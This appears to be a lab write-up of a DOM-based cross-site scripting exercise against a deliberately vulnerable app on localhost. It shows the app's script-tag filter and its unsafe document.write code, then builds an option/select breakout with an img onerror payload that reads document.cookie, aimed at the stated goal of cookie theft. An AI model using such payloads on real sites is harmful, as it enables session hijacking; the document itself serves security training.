### Objective

Run your own JavaScript in another user's browser, use this to steal the cookie of a logged in user.

Let's do try out common stuff first.
```html
http://localhost:5000/vulnerabilities/xss_d/?default=<script>alert('xss')</script>
```
Response
```html
http://localhost:5000/vulnerabilities/xss_d/?default=English
```
Weird maybe it's filtering for script?
```php
`<?php  
  
// Is there any input?  
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { $default = $_GET['default'];
# Do not allow script tags
if (stripos ($default, "<script") !== false)
{ 
header ("location: ?default=English");  
        exit;  
    }  
}  
  
?>`
```
Looks like it is checking for instances of script tags so we can't use that. Let's try something with img tags.
```html
http://localhost:5000/vulnerabilities/xss_d/?default=<img src=# onerror=alert('xss')>
```
Nothing shows up. Lets view the JS source code.
```html
<select name="default">
    <script>
    if (document.location.href.indexOf("default=") >= 0) {
        var lang = document.location.href.substring(document.location.href.indexOf("default=") + 8);
        document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
        document.write("<option value='' disabled='disabled'>----</option>");
    }

    document.write("<option value='English'>English</option>");
    document.write("<option value='French'>French</option>");
    document.write("<option value='Spanish'>Spanish</option>");
    document.write("<option value='German'>German</option>");
    </script>
</select>
```
Looks like it's decoding our payload not something we want. Let's try to escape it.
```html
>test</option></select><img src=# onerror=alert(document.cookie)>
```
Okay so first off we close the option bracket and then close the option tag.Since we don't want our script to be decoded into URI, let's escape the select tag too. Finally we can put our payload in. Our img won't load in the option tags and be embedded in the page, so it will run automatically.